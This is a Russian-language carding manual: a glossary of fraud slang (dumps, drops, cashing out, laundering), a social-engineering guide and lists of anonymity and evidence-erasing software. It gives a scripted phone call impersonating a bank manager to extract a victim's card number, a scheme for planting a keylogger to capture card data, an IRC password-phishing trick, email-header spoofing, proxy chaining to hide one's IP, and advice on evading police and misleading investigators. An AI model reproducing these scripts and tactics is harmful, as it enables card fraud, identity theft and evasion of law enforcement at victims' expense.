транзакция - сделка, проводка по счетам. дроп - общее название того, кто принимает "грязный" товар или деньги, бывают профессиональными (осознают что делают) или жертвами, которые не осознают того, что делают.

палка - система денежных переводов PayPal;

реальный пластик - поддельная кредитная карта, которую возможно использовать для покупок в реальных магазинах. Такая карта является своего рода дубликатом где-то реально существующей кредитной карты.

энролл (от англ. enroll) - привязка кредитной карты банковского счета к он-лайну, с возможностью изменять их данные через интернет.

юзать (от англ. use) - использовать.

Access Control Cards - Карта системы контроля доступа, Пропуск

Пластиковые карты, используемые для организации доступа в помещения, обычно выполняются в виде карт с магнитной полосой или бесконтактных смарт-карт.

Эквайр - Банк или иной финансовый институт, заключивший договор с торговой организацией на приём платёжных карт и ответственный за оплату счетов владельцев карт.

Authentication - Технология удостоверения личности в автоматизированной информационной системе

Authorization - Авторизация, требование оплаты. Блокирует деньги на счету, уменьшая свободную (Open to Buy) для покупок сумму. Чтобы снять деньги, необходимо завершить авторизацию, см. Settled. Если за время, которое определяется эмитентом (см. Issuer), авторизация не завершается, она отменяется и ранее заблокированная сумма освобождается для покупок

Batch - Набор транзакций, сохраняемый для одновременной оплаты, которая происходит обычно раз в день.

Batch можно завершить как автоматически, так и с помощью POS-терминала

BIN - Bank identification number (Банковский идентификационный номер) - уникальный номер, который присваивает банку платежная система на совершение операций по эмиссии и эквайрингу пластиковых карт.

Encoding - Кодирование

Процесс записи информации на магнитную полосу или микросхему памяти смарт-карты.

Factoring - Ситуация, когда собственный Merchant Account используется для приема за дополнительную плату платежей для другого продавца. Factoring считается нелегальной операцией. Чтобы легализовать Factoring, необходимы специальные юридические схемы, как, например, в CCNOW (www.ccnow.com).

Holdback - Часть средств, полученных продавцом от карточных платежей, блокируемая эквайером или другим MAP, чтобы покрыть расходы на chargeback и другие спорные выплаты. По истечении определенного срока Holdback возвращается продавцу.

Слип - синоним слову чек применительно к карточным расчётам.

Чарджбек - опротестование банком кардхолдера снятия денег с его карты.

адалт, адульт (от англ. adult [эдалт]-взрослый)

1. сайт с содержанием только для взрослых, порно-сайт;

2. направление работы в кардинге.

акк (от англ. account) - счет.

аук - сокращ. от аукцион.

биллинг (от англ. bill - счет)- платежный, платежная система.

ебэй, ебай - название аукциона eBay [и:'бэй].

мерчант (merchant) - торговый счет, система он-лайн торговли.

cc, креда - кредитная карта.

ccv (сокр. от Credit Card Verifier) - дополнительный защитный код в кредитной карте.

дамп (dump) - информация с магнитной ленты или чипа кредитной карты.

кардинг (термин впервые появился в рунете в начале 90х годов прошлого столетия

1. (юридическое определение) вид мошенничества с использованием пластиковых карт или информации которую они содержат. Как преступление относится к высоко-интеллектуальным или т.н "бело-воротничковым";

2. (экономико-политическое определение) добровольно- принудительное перераспределение денежных средств от банков стран с высокой концентрацией спекулятивного капитала к активным экономическим субъектам с высокой концентрацией интеллекта;

3. (филосовские определение) ловкость ума и никакого мошенства.

транзакция - сделка, проводка по счетам.

холдер (holder - держатель) - настоящий владелец реальной кредитной карты.

дроп - общее название того, кто принимает "грязный" товар или деньги, бывают профессиональными (осознают что делают) или жертвами, которые не осознают того, что делают.

грязь, грязные деньги товар - деньги или товар незаконное приобретение которых возможно проследить;

чистые либо "отмытые" товар деньги - деньги или товар незаконное приобретение которых проследить НЕвозможно;

картон, картофель - данные где-то реально существующей кредитной карты, которые используются кардером как правило только для транзакций через интернет;

нал - 1. наличные деньги; 2. процесс перевода денег из безналичной формы в наличные, обналичка; 3. см также "отмыв" .

налить - обналичивать;

отмыв - превращение "грязных" денег в "чистые", то есть такие, незаконное происхождение которых невозможно или крайне трудно отследить и доказать; обрыв связи денег с их незаконным происхождением.

палка - система денежных переводов PayPal;

реальный пластик - поддельная кредитная карта, которую возможно использовать для покупок в реальных магазинах. Такая карта является своего рода дубликатом где-то реально существующей кредитной карты.

спам - рассылка писем по электронной почте в неограниченных количествах.

сокс, сокс-прокси (англ. socks-proxy) - сервер-посредник между вашим компьютером и конечным сервером сайтом, используемый чтобы скрыть ваш IP-адрес.

шоппинг (от англ. shopping) - покупки или серия покупок в магазине.

эноролл (от англ. enroll) - привязка кредитной карты банковского счета к он-лайну, с возможностью изменять их данные через интернет.

юзать (от англ. use) - использовать.

Некоторые часто встречаемые англ. сокращения:

DL, driver licence - удостоверение на право управления транспортным средством, водительские права

ID, identity document - удостоверение личности

DOB, date of birth - дата рождения

SSN, Social Security Number - государственный номер, который присваивается для каждого жителя США для целей налогообложения и учета движения денежных средств, в том числе и кредитной истории

SIN - канадский аналог SSN

MMN, mother's maiden name - девичья фамилия матери

PIN, personal identification number - аналог пароля, состоит только из цифр и используется для авторизации.

Этот раздел кардерского искусства очень важен. Большинство взломов происходит не без помощи социальной инженерии, и именно она подчас определяет провал или успех операции. Собственно, для некоторых операций социальная инженерия – единственное, что нужно для их осуществления.

Социальная инженерия

Социальная инженерия (Social Engineering) - это наука, с помощью которой происходит управление людьми против их воли и желания. Она была изобретена фрикерами уже довольно давно: лет двадцать - тридцать назад. Кстати, очень известными специалистами СИ были Кевин Митник и Росско.

В этой статье будет использоваться толкование, относящееся исключительно к компьютерной безопасности. То есть сейчас СИ - это способ нелегального доступа к секретной или личной информации путем обмана людей. Неброско, зато ясно. Обычно цель атаки СИ одна - получить пароль, необходимый для доступа к какой-либо секретной базе данных, в последнее время целью СИ часто является номер кредитки незадачливого юзера.

Простейшая СИ атака делится на 3 фазы: диверсия, реклама, помощь. С диверсией все просто, кардер-хакер просто нарушает работу компьютера жертвы любым способом. Это может быть как банальный вирус на дискете или в письме, так и хорошая атака на хост из Сети. После того, как комп загнулся, наступает второй этап взлома: реклама. Здесь кардер информирует жертву всеми доступными средствами (бумажные объявления, общие друзья, ICQ, спам), что именно он сможет вернуть к жизни безвременно скончавшуюся ОС. И только следующим шагом становится непосредственно помощь. Под "помощью" кардеры понимают восстановление компьютера, в ходе которого происходит незаметное для юзера выманивание из него необходимой инфы. О способах помощи мы поговорим чуть ниже, а сейчас рассмотрим места, где обычно проводятся атаки класса СИ.

Знал бы, где упадешь...

Излюбленные орудия и способы кардеров, проводящих такие атаки, широко известны: телефоны, как обычные, так и сотовые, личные встречи с жертвой, письмо - обычное бумажное или послание по мылу, различные чаты в сети (ICQ, IRC, банальный web-chat). Дальше я постараюсь изложить основные тонкости каждого.

Телефон - средство кардера

Начнем, пожалуй, с самого старого, но и сейчас активно используемого способа: общение с жертвой по телефону.

Вот основные плюсы такого метода:
  1. Достаточно высокая анонимность, особенно при использовании левой линии с антиАОНом или звонка с таксофона.
  2. Высокая эффективность, которая объясняется возможностью представиться любым человеком, и, при наличии навыков, атакуемый не заметит подвоха.
  3. Быстрые результаты - кардеру не нужно ждать, пока дойдет письмо или вернется инет, упавший из-за грозы. При использовании мобильника мы получаем полную свободу, что немаловажно в трудовые будни. На этом плюсы социальной инженерии с использованием телефона заканчиваются и начинаются отрицательные стороны.
Самая большая проблема – это твой голос, особенно если человек на другом конце провода хорошо знает того, за кого себя выдает взломщик (к примеру, менеджера банка Х). Встает необходимость смены голоса любыми способами. Если не получается подобрать тон, то атакующий часто пытается сослаться на болезнь (хотя я сомневаюсь, что здоровый еще час назад человек может вдруг заболеть ларингитом с полной потерей голоса). Дальше стоит проблема фона - в любой организации добиться абсолютной тишины невозможно, а особенно в банках (я так часто говорю про банки потому, что кардеры чаще выдают себя за высокопоставленных служащих банка атакуемого). И значит, если некто позвонит в разгар рабочего дня и в его "офисе" будет стоять гробовая тишина, то кардеру не поверят или заподозрят неладное. Значит, необходимо применить одну из следующих уловок: телефонный аппарат, генерирующий шум офиса, запись из реального рабочего офиса или трансляция посредством радиожучков из другой организации (выбирается предельно тщательно). С технической стороной этого способа мы познакомились, переходим к самому радикальному и опасному - личная встреча.

Connect on TET-a-TET!

У встречи с жертвой, так сказать, тет-а-тет есть как явные недостатки, так и явные преимущества. К недостаткам относится то, что кардера, возможно, запомнят, следовательно он должен найти время и очень тщательно подготовиться - начиная с одежды и заканчивая прической, все должно соответствовать имиджу делового респектабельного человека (вряд ли лохматый и небритый голодранец может внушить доверие). Как ты понимаешь, из этого следуют и проблемы с поведением - кардер должен контролировать свои эмоции и вести разговор на "правильном" языке, не используя сленга, эффект от которого прямо противоположный.

Расстояние также играет немаловажную роль - при атаке с помощью телефона взломщик может находиться за тысячи километров от жертвы и добиться результатов без проблем, а для встречи ему придется приехать в город атакуемого. Несмотря на эти недостатки, СИ во время личной встречи не спешит сдавать позиции, поскольку способ этот не лишен достоинств - во время общения кардер видит человека, а значит, легко поймет, верит он ему или нет. Это позволяет моментально корректировать тактику атаки. Профессиональные кардеры имеют в запасе множество мелких психологических приемов (с некоторыми можешь познакомиться во врезке), которые резко повышают эффективность их труда. А истинные гуру не только имеют за плечами психологическую подготовку, но и владеют приемами гипноза, что позволяет им добиться практически стопроцентной эффективности, не оставляя следов. Этот способ оправдывает себя, только если человек имеет немалый опыт убеждения людей или владеет спецподготовкой (тут рулят психологи и психиатры).

Дальше я расскажу тебе о способах, появившихся совсем недавно, но уже получивших немалое распространение. Открывает наш мини-обзор инет-средств СИ простая электронная почта. Именно с помощью посланий по e-mail проводятся многие атаки, направленные на получение не только твоей креды, но и личной инфы более интимного характера. Я бы сказал даже, что большинство таких атак проведено именно с помощью электронной почты, поскольку она позволяет без проблем обрабатывать несколько человек одновременно.

Сеть нам кардить и жить помогает

В сущности, такая атака довольно проста - кардер переписывается с жертвой с левого почтового ящика и пытается выудить нужную инфу. При всей простоте проведения, необходимо учитывать некоторые тонкости, связанные с почтовой программой и заголовками письма. Так, сначала следует узнать, каким почтовиком пользуется человек, за которого взломщик выдает себя. Для этого достаточно получить от жертвы любую мессагу и, заглянув в заголовки (в аутлуке – «свойства письма», в бате – «F9», а в kmail жми на V), выяснить значение поля X-Mailer. Еще надо постараться, чтобы заголовки письма не содержали инфы, которая может выдать атакующего с потрохами. И хотя обычные люди вряд ли станут проверять, откуда пришло письмо, страховка еще никому не мешала. Итак, основная проблема – IP-адрес отправителя мессаги. Именно с его помощью были пойманы первые начинающие кардеры. Для того чтобы не оказаться в их числе, при отправке своих посланий кардеры юзают один из следующих способов. Первый состоит в простой перенастройке своего почтовика на другое имя и другой сервак, лучше применить систему профилей для каждой жертвы, чтобы не лезть каждый раз в настройки. Второй способ также несложен - найти программу, которая позволяет самому заполнять служебные поля, но здесь кардер старается всеми способами получить доступ к реальному почтовому серверу подставляемого чела. А вот третий гарантирует очень высокую эффективность, правда, с некоторыми затратами мозговых ресурсов кардера. Для выполнения диверсии следует с помощью простого терминала (стандартный от виндов подойдет на 100%) подключиться к серверу SMTP на 25 порт и продиктовать все поля с терминала. Помогают также и проги, типа Anonymity Mailer, позволяющие отправлять почту от любого имени.

/dev/hands and /dev/mozg в бой!

Теперь перейдем к тому, как все-таки в реальной жизни используется СИ атака. Первый распространенный способ - это звонок по телефону, в результате которого происходит примерно такой диалог между кардером и жертвой:

-Кардер: Здравствуйте, это Василий Лохов?

-Жертва: Да.

-К: Я - Иван Иванов, менеджер отдела по работе с пластиковыми картами банка Ч. Вчера нам пришел запрос на перевод $1053 с вашего счета на счет интернет-магазина, который числится у нас в черном списке (больше воды и крутизны!). Наш банк очень беспокоится за своих клиентов, и поэтому просим подтвердить передачу денег.

-Ж: А… У… Я… Я ничего не покупал…

-К: Хм. Странная ситуация. Вы никому не сообщали номер своей кредитной карты?

-Ж: Нет.

-К: Тогда, возможно, это ошибка нашего программного обеспечения… только 3 дня назад перешли на новую версию (банк крут, шагает в ногу со временем). Назовите номер вашей карты и дату окончания действия, мы сверим и сообщим результат. Если это ошибка с нашей стороны, то ваш счет будет восстановлен.

-Ж: Сейчас-сейчас. 987654321 01/24.

-К: Спасибо, сейчас будет проведена проверка. В течение 2 часов не проводите платежных операций с пластиковой картой нашего банка. До свидания!

-Ж: До свидания.

После такого разговора крайне желательно позвонить и успокоить юзера, что все нормально, его счет цел и невредим. Если жертва - простак, то он не побежит в банк и не станет узнавать у менеджера Ивана Иванова об ошибках ПО. И через некоторое время с ужасом обнаружит опустошение лицевого счета. А если кардер понимает, что жертва очень подозрительна, то старается провести все покупки моментально, либо вообще никогда (если атакуемый узнает, что никакой ошибки не было и что Иван Иванов уже 3 дня греется на Канарах, он обязательно заблокирует карту).

А еще вот так...

Следующий способ был найден совершенно случайно. Его реализация не требует больших затрат, да и СИ тут не так уж много. Представь себе следующее: есть некий инет-магазин (пусть будет абсолютно любой, ломать мы его не будем), в этом магазине жертва покупает любой товар, и номер его креды у тебя! Как? Секрет фокуса прост: ты ставишь ему на машину троянца/логгер клавиатуры и, как только получаешь необходимый номер, уничтожаешь все следы. А задача социальной инженерии тут в том, чтобы любым способом упросить человека купить что-то именно в этом магазине по СВОЕЙ креде. На все вопросы отвечай, что твоя кредитка пуста, а не платишь... ну, хотя бы потому, что хочешь завести другую, или твоя подруга требует много наличных сразу (это проходит - проверено). И обязательно пообещай возместить (и возмести!) все денежные затраты, плюс угости пивом, чтобы снять с себя подозрения. Но при всей простоте существует маленькая загвоздка: если жертва не начнет сразу проводить операции с кредой, тебе будет трудновато найти номерок в куче введенных символов. Поэтому - сходи сам на страничку закупки товаров этого магазина, найди обязательные поля и запомни, по ним искать будет проще.

Пока ты ищешь жертву, я тебе расскажу еще об одном способе. Сейчас нашим местом действия являются IRC-каналы и сети. Если человек, которого ты хочешь подставить, пользуется иркой, то тебе все карты в руки, дерзай.

Ирка... Как много в этом слове для сердца кардера слилось

Для начала выясним пароль на IRC жертвы, точнее, его она нам сообщит сама. Подготовка минимальна: 2 запущенных IRC-клиента у тебя на компе, причем один бот, а второй любой ник (из-под него ты будешь инженерить), причем ник твой должен иметь права оператора канала, хотя бы временно. После этого начинается СИ атака на юзера/юзеров, которая состоит из того, что ты шепчешь (или на весь чат произносишь), что для получения операторских прав достаточно послать сообщение боту канала. Но тем, кто никогда не был оператором (чувствуешь подвох?) необходимо провести идентификацию своего IP и DNS. Для выполнения этой операции напиши /msg bot identify твой_ irc_пароль. Робот проведет все настройки и будет встречать тебя по паролю. А дальше необходимо подготовить отступление: ты всем или только оператору канала сообщаешь, что уходишь и, возможно, не появишься несколько дней по причине отъезда. Затем, слезно попрощавшись со всеми... закрываешь второй IRC-клиент. А первый, с ботом, не трогаешь. Осталось только ждать получения пароля юзера в чистом виде. Дальше, ведь ты сейчас робот, необходимо отправить уведомление об аутентификации. И только после этого можешь смело отсоединяться от канала. И дальше начинаешь пробовать этот пароль к другим IRC-каналам, местным web-чатам и даже к аське. Очень многие имеют только один пароль на множество личных ресурсов, объясняя это нежеланием запоминать много "ненужной" инфы. Ну что ж… пусть поплатятся! А дальше, используя найденный пароль, начинаешь проводить СИ атаку на знакомых жертвы, цель которой - все та же креда.

Чем все кончается

Еще я должен рассказать тебе о том, как может повести себя жертва во время и после проведения атаки. Обычно все проходит гладко, но кто предупрежден, тот вооружен.
  1. Жертва, ничего не подозревая, попадается на твою диверсию. Тут даже комментарии излишни ;-). Ты просто наслаждаешься плодами атаки и особо ни о чем не задумываешься. Вся работа после нападения сводится лишь к периодической проверке, как идут дела у жертвы с кредой, и выяснению – а не заметил ли он проблем. Самый благоприятный для кардера вариант.
  2. Атакуемый достаточно умен и не поддается на твои уловки. В такой ситуации перед кардером встает выбор: попробовать другие методы или отстать от этого чела. Если ты выбираешь второе, то сохрани с уже бывшей жертвой дружбу. А если ты воинственный индеец и не думаешь закапывать топор войны, то дерзай! Хотя трудности прибывают с каждым новым заходом, так как жертва видит, что к ее персоне ты проявляешь повышенное внимание. Еще раз повторяю, необходимо быть предельно осторожным при повторных атаках. Просто помни, что жадность фраера сгубила.
  3. Владелец креды просек, что его очень хотят развести на креду, но никуда не обратился. Такой исход, конечно, плох, но не смертелен - твоей свободе ничто не угрожает, правда могут поползти слухи о твоей грязной политике. Это испортит твою репутацию, поэтому постарайся при первых же недовольных воплях жертвы среагировать и исправить все на месте. Можешь прикинуться дурачком, который ничего и никогда не замышлял. И успокаивай себя тем, что ничего еще не потеряно.
  4. Бывший друг не просто понял, что его пытаются кинуть, но и обратился куда следует с заявлением (бывает, что у него там еще и друзья). Это уже не очень хорошо, хотя и до срока тоже пока далеко. Чтобы не приближать этот момент – будь законопослушен, не нарушай, просто помни – ты можешь быть под прицелом. Примерно через полгода можешь браться за старое, но уже с удвоенной осторожностью. А вот если к тебе уже приходили - завязывай с кардингом, у них кое-что существенное на тебя есть. И самое главное, никогда не расставайся с наукой СИ, даже на допросах. Главная причина гибели юных талантов на нарах проста: они забывают, что следователи тоже люди, пусть и замаскированные в форму. А значит, и к ним можно применить трюки кардера. Правда, в школах милиции тоже учат психологию, но кто же помнит, чему его учили в вузе?
Психологические трюки кардера!

Трюки, о которых я тебе расскажу, используются очень многими – кардерами, хакерами, психологами, менеджерами и прочими обманщиками. Уверен, что они помогут тебе не только во взломе, но и в личной жизни.
  • Если хочешь воздействовать на чувства человека - говори в левое ухо, на логику - в правое, но учти, что пропитое лицо, прочувствованно просящее номер креды, вряд ли добьется успеха!
  • Разговаривай с объектом на привычном для него языке. Так, если это простой человек, мало смыслящий в ИТ и, в частности, в кредах, не используй жаргон. Лучше пять раз объяснить свою мысль на его языке, зато тебя поймут, и не возникнет разрыва в беседе.
  • Лучше всего память работает между 8-12 часами утра и после 9 часов вечера, хуже всего - сразу после обеда.
  • Незаконченные действия (разговор, утверждение контракта, встреча) запоминаются в два раза лучше доведенных до конца.
  • Наука подсчитала, что человек говорит только 80% из того, что хочет сообщить, собеседники воспринимают 70% из этого, а понимают - 60%, запомнят от 10 до 25% всей инфы. Поэтому грузи и не жалей.
  • Чтобы жертва прониклась твоей мыслью, повторяй основные ее тезисы как можно чаще, но не переусердствуй! А то будешь только и говорить: "Дай номер креды!!!"
  • Старайся не просить в открытую, пусть человек поймет, что тебе нужно, и предложит сам.
  • Отвечая на любое резкое утверждение, жертва может легко выдать себя с потрохами, поэтому - озадачивай и озадачивай.
  • Базовой гипнотической способностью обладают все люди, особенно с сильной волей, поэтому, если ты пытаешься убедить человека, старайся смотреть ему в переносицу и думать, о чем говоришь.
  • Возраст влияет на мозг человека, например, молодежь лучше соображает вечером, а пенсионеры утром.
  • Многие вопросы, требующие ответа "да" или "нет", сбивают говорящего с предыдущей мысли, так что если тебя начали подозревать, используй это.
  • Некоторых людей можно вызвать на откровенный разговор, только показывая, что ты им не веришь.
  • Доказывая свою правоту, используй только факты и тезисы, которые может понять объект.
  • Старайся выглядеть знающим человеком в своей области, простые люди инстинктивно тянутся к более умным и знающим.
  • Фраза, произносимая дольше 5-6 секунд без пауз, перестает восприниматься.
  • Полезно придавать отдельным утверждениям форму нейтрального вопроса (например, риторического), тогда твой собеседник не ощутит давления и сможет воспринять подобную подачу как собственное мнение.
Все. Моя статья закончена, надеюсь, тебе было интересно, и ты узнал кое-что новенькое о жизни кардеров - социальных инженеров.

Софт для безопасности

Proxy

Proxifier


Proxifier - программа, позволяющая сетевым програмам не имеющим возможность работать через прокси сервера обходить это ограничение. С Proxifier вы можете работать с любыми интернет клиентами (браузеры, ftp, ICQ, IRC, Kazaa, Telnet, ssh, видео и аудио, играми, и т.п.) из сети, которая отделена от Интернета файерволом (необходим только один открытый порт). Proxifier поможет обеспечить секретность вашей информации, посылать и получать e-mail через прокси сервер, или цепь прокси серверов. Все почтовые клиенты поддерживаются (Outlook, Eudora, Netscape и другие). Программа очень полезная и, главное, работает!

офф сайт Proxifier - Bypass firewall and proxy, tunnel connections through an HTTPS and SOCKS proxy

FreeCap

Утилита, которая позволяет прозрачно перенаправлять запросы на соединение от программ, которые не имеют родной поддержки SOCKS-прокси. Поддерживаются SOCKS протоколы v4 и v5, возможна работа через цепочку SOCKS-серверов (SOCKS Chain), а также прямые соединения на определённые порты. Полная поддержка стандартов RFC 1928, 1929, 2817 (SOCKS v4 и v5, авторизация для SOCKS5 и HTTP CONNECT).

Офф сайт: FreeCap Homepage

WideCap 1.5

Системный поксификатор. Продолжение программы FreeCap.

Офф сайт: WideCap Home

SocksCap_2.40

Позволяет практически любой программе работать через socks5 прокси.

Настройка программы SocksCap не составит никакого труда, т.к. в ней поддерживается метод drag&drop - для добавления приложений, которым нужно разрешить выход в Интернет, достаточно просто перетащить их иконки в окно SocksCap. Настолько же просто выполнено и управление запуском программ, выходящим в Интернет через socks5 прокси: для этого достаточно всего лишь нажать правой кнопкой мыши на иконке SocksCap, находящейся в системном лотке, и выбрать необходимую программу.

SocksChain

Программа, позволяющая работать через цепочку SOCKS или HTTP-проксей для того, чтобы скрыть истинный IP-адрес. SocksChain может работать как обычный SOCKS-сервер, транслируя запросы по цепочке проксей, также он может быть использован с клиентскими программами, которые не поддерживают протокол SOCKS, но работают с одним TCP-соединением, например TELNET, HTTP, IRC... (FTP использует 2 соединения). При этом ваш IP-адрес не будет появляться в логах сервера или заголовках почтовых сообщений.

Настройка SocksChain:

1. Добавляем прокси, есть два способа:

а) Файл -> Импорт -> Ваш список прокси (взять можно из паблика любых)

б) Инструменты -> Proxy manager -> Add -> Вставляете из буфера -> OK

2. Прокси загрузили, нужно их прочекать:

Инструменты -> Proxy manager -> Test all

Если рядом с вашим прокси рисунок лампочки - значит ок, прокси рабочий, если кружок с крестиком - значит прокси мертв (ну тут все понятно, нужно искать еще).

3. Настраиваем нашу цепочку:

Service -> Modify (появляется окно, пройдемся по пунктам)

Имя: Chain

Входящий порт: 1080

Auto-creating chain: ставим галочку

Change the chain every: пишем число побольше, например, 99999999

Chain Length: тут можно указать количество прокси в вашей цепочке, чем больше прокси в вашей цепи - тем безопаснее, но и скорость заметно уменьшается, рекомендую от 1 до 3

Ниже находится маленькое окно, тут будет отображаться ваша цепочка из прокси, число в графе "Chain Length" должно соответствовать числу проксей в этом маленьком окне, т.е. если вы поставили в Chain Length "2", то и проксей в окне должно быть тоже два.

Справа список всех ваших соксов/прокси, чтобы добавить прокси в цепочку (в то маленькое окошко), кликаем на прокси (т.е. выделяем его) и нажимаем кнопку Add, если вам нужно, чтоб в цепочке было, например, 2 прокси повторяем действие. Ниже есть еще одно маленькое окошко, нам оно не интересно, оно должно быть пустым (если там есть сокс, удалите его кнопкой Delete). Нажимаем OK.

4. Инструменты -> Options -> Общие

Количество потоков: 30 (выбираете сами)

Time-out: 99999 s (выбираете сами)

Sessions time out after 99999 seconds of inactivity: (выбираете сами)

Enable connections only from localhost (127.0.0.1) (отмечаем)

Save Log to file SocksChain.log (можно отметить, можно не отмечать)

Fast disconnect (убираем галочку)

Инструменты -> Options -> Общие -> Proxy отмечаем Directly и Resolve domain names locally

Инструменты -> Options -> Upgrade отмечаем Enable Interaction with site. Нажимаем OK.

Все, SocksChain настроили.

проверка HTTPS/SOCKS proxy серверов

Socks_checker 1.3.1

Программа предназначена для проверки HTTPS/SOCKS proxy серверов. Программа позволяет проверять HTTPS (CONNECT), SOCKS4, SOCKS5 proxy серверы; брать списки proxy как из текстовых, так и из HTML файлов самого различного формата; проверять списки proxy любого размера; проверять прокси на подключение к IRC сетям или к почтовым серверам.

Ultra Socks Checker 1.0

Программа предназначена для проверки HTTPS/SOCKS proxy серверов. Программа позволяет проверять HTTPS (CONNECT), SOCKS4, SOCKS5 proxy серверы; брать списки proxy как из текстовых, так и из HTML файлов самого различного формата; проверять списки proxy любого размера; проверять прокси на подключение к IRC сетям или к почтовым серверам.

Смена ID

ID-Blaster Plus

Утилита для оперативной смены Windows Product ID, UserID, Internet Explorer ID и идентификационного номера Windows Media Player. Учитывая, что эти данные потенциально небезопасны, так как являются уникальными для каждого компьтера и поэтому могут быть использованы для отслеживания действий пользователя, возможность сменить их может повысить уровень приватности.

Работает ID-Blaster Plus из системного лотка - клик, и открывается список с заранее введенными "поддельными" данными.

CCtools

v. 1.2 eng
v. 1.5 rus

Смена ID OС, смена ID IE, смена ID WMP, смена Hostname, смена имени на которое зарегистрирована ОС, смена названия компании на которое зарегистрирована ОС , смена названия процессора, смена билда системы, сохранение всех текущих ID в файл с возможностью их загрузки в программу, функции для генерации всех ID (в ручную писать не чего не придется).

RMOSChange 2

Программа изменяет HTTP заголовки Internet Explorer, Firefox, Mozilla, так, что сервер, не сможет узнать какая у вас установлена ОС, версия браузера и язык системы. Кстати, proxy скрывает только IP-адрес, но не больше. Вы можете выбрать себе Linux, SunOS, MacPC, Win 2003.

STZ Blaster

Для смены ID компа, часового пояса и т.п.

Чистка системы

CCleaner

Данная утилита предназначена для чистки системного мусора. В ходе своей работы CCleaner (Crap Cleaner) ищет и удаляет временные и неиспользуемые файлы. Сюда относятся: cookies, история посещения сайтов в IE, временные файлы Интернета, строки поиска, файлы Корзины и т.д. Также поддерживается поиск временных файлов сторонних приложений: Firefox, Opera, Media Player, eMule, Kazaa, Google Toolbar, Netscape, Office XP, Nero, Alcohol 120, Adobe Acrobat, WinRAR, WinAce, WinZip, GetRight, Morpheus, Download Accelerator Plus, VirtualDub, ZoneAlarm и многих других.

Evidence Eliminator 6.01

- защитный инструмент, позволяющий быстро и качественно удалить информацию, которую видеть посторонним ни к чему. Это может быть и информацией о сайтах, которые вы посетили, с какими документами работали, какие файлы были на компьютере и т.д.

Eraser

Инструмент для безопасного стирания файлов, который позволяет полностью удалять данные с жесткого диска, записывая поверх них несколько раз сложные образцы, чтобы невозможно было восстановить стертые данные. Вы можете просто перетащить файлы и/или папки на соответствующую иконку, использовать меню Windows, щелкая правой кнопкой мыши, или использовать встроенный планировщик для автоматизированного стирания неиспользуемого дискового пространства, файлов кэша и т.д.

Шифруем инфу

TrueCrypt 6.3


Позволяет создавать виртуальные зашифрованные диски, которые затем могут использоваться как обычные логические диски системы. Допустимые алгоритмы шифрования: AES (256-bit key), Blowfish (448-bit key), CAST5 (128-bit key), Serpent (256-bit key), Triple DES, Twofish (256-bit key). В качестве зашифрованного хранилища ("диска") можно использовать как часть свободного места на диске, так и целиком один из имеющихся разделов жесткого диска, а также flash-карты, дискеты и другие сьемные устройства хранения данных.

Еще одна из особенностей программы - отсутствие в заголовке созданного "диска" специфической сигнатуры, характерной для других подобных программ, что делает невозможным идентифицировать TrueCrypt-диск, т.к. ни одна из частей виртуального диска не отличается от случайных данных. На домашней странице доступны исходники.

Secustar DriveCrypt Standard

Securstar GmbH выпустила новую финальную версию программы DriveCrypt 4.10 для шифрования как данных так и партиций HDD дисков.

На данное время это одна из самых надёжных и эффективных программ шифрования данных.

SecurStar DriveCrypt 4.1 - это эффективное средство надёжной защиты конфиденциальной информации с помощью надежных алгоритмов шифрования (1344Bit Military Strength Hard Disk Encryption) а так же DriveCrypt представляет пользователю функции стеганографии т.е умеет скрывать наличие у пользователя контейнер с секретными файлами в аудио файлах.

BestCrypt Volume Encryption

обеспечивает прозрачное шифрование всех данных, хранящихся на жёстких и съёмных устройствах, автоматически, как только данные затрагиваются Windows или любыми другими программами. В случае шифрования системного или загрузочного раздела, то BestCrypt Volume не позволит загрузиться системе без ввода необходимого пароля. Программой используются режим шифрования для дисков LRW и современные и подтвержденные криптостойкостью продвинутые или скоростные алгоритмы шифрования с максимальным ключом: AES (Rijndael) -256; Blowfish - 448; CAST - 128; GOST 28147-89 - 256; RC6 - 256; Serpent - 256 и Twofish 256-бит. Кроме ввода пароля, как самого уязвимого места программа предлагает использование аппаратных USB-ключей как высоко секретное хранилище ключей шифрования. С аппаратными USB-ключами пользователь получает два уровня защиты зашифрованных данных, так как вместе с вводом пароля необходимо подсоединить к компьютеру небольшое по размеру аппаратное USB-устройство, где хранится ключ шифрования. К тому же вся система автоматически шифруется при переходе ее в "спящий режим" и BestCrypt Volume Encryption поддерживает несколько функций спасения, позволяющие пользователю расшифровать тома, если случается серьезная поломка диска.

Софт для кардера

Когда СМИ сообщают о поимке очередного кардера, первая мысль - скорее всего, взломщик халатно отнесся к собственной безопасности. Если не хочешь оказаться на его месте, позаботься о своем анонимном существовании.

Прокси-сервер

Все типы proxy-серверов обычно делят на три категории: шлюзы, кешируюшие и анонимные proxy-серверы.

Шлюзы чаще всего используются администраторами локальных сетей. Не давать же каждому пользователю "персональный" выход в глобальную сеть, вот и устанавливают прокси-сервер, чтобы удовлетворить за раз множество пользователей :). Но отсюда и своя особенность – ни один внешний узел сети не может установить соединение с клиентом, так как proxy-сервер не понимает, кому из пользователей предназначен этот запрос. И поэтому при работе со шлюзом возможен только один тип соединения - от клиента к серверу.

Админы таким образом ограничивают пользователей - множество программ (к примеру, ICQ) не будут работать, так как требуют двухсторонней установки соединения. Зато огромный плюс - повышенная безопасность.

Второй тип proxy-серверов - кешируюший. Его использование (добровольное) значительно ускоряет загрузку страниц, особенно при соединении с сильно перегруженными серверами либо на плохой линии. Идея ясна - сервер сохраняет любые получаемые данные на своем диске (в кеше), и если запрошенный клиентом ресурс уже находится в кеше, он "отдается" уже без обращения к удаленному серверу. Схема не подходит для часто обновляющихся ресурсов, но "умные" кешируюшие прокси-серверы умеют с течением времени заново обращаться к удаленным серверам, проверять ресурс на наличие изменений и, соответственно, обновлять свой кеш.

Последний тип прокси-серверов - анонимные. Они отправляют запрос на получение данных от своего имени, не разглашая при этом IP пользователя. Они-то тебе и нужны.

Зачем это нужно

Анонимные прокси позволяют скрыть свой подлинный IP-адрес при манипуляциях в инете и при повседневном просмотре веб-страниц, закачке софта и т.п. К тому же большинство программ (IE, Opera, ICQ, Reget) умеют работать с прокси-серверами. Польза от использования этой связки несомненна - никто и никогда не узнает твой истинный IP-адрес, что поможет избежать кары небесной, а также отрезать всевозможные атаки извне на твой компьютер.

Ищем прокси-серверы

Ищут прокси-серверы двумя методами: в поисковиках или через специальный софт. Самый простой и распространенный поиск - по-дедовски, в популярных поисковых системах, типа www.google.com, www.yahoo.com и т.д. Заходишь на любой из них и вводишь "прокси" + "лист". Результат перед глазами: куча ссылок, разгребать которые можно всю жизнь (при наличии свободного времени), причем велика вероятность получения битых ссылок.

